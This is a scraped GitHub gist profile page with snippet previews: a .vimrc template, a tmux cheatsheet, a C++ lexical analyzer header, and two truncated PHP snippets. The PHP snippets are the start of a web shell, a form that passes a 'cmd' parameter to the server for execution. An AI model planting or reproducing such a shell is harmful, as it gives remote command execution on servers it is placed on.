Skip to content

Instantly share code, notes, and snippets.

View tngo0508's full-sized avatar
🎯
Focusing

Thomas Ngo tngo0508

🎯
Focusing
View GitHub Profile
@tngo0508
tngo0508 / .vimrc
Created September 21, 2019 02:15 — forked from simonista/.vimrc
A basic .vimrc file that will serve as a good template on which to build.
" Don't try to be vi compatible
set nocompatible
" Helps force plugins to load correctly when it is turned back on below
filetype off
" TODO: Load plugins here (pathogen or vundle)
" Turn on syntax highlighting
syntax on
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{
@tngo0508
tngo0508 / tmux-cheatsheet.markdown
Created September 19, 2017 04:47 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
//============================================================================
// Task : Compiler
// Description : Lexical Analyzer
// Name : Mahmoud Mohamed Fathy
// ID : 2012030135
//============================================================================
#include <iostream>
#include <fstream>
#include <string>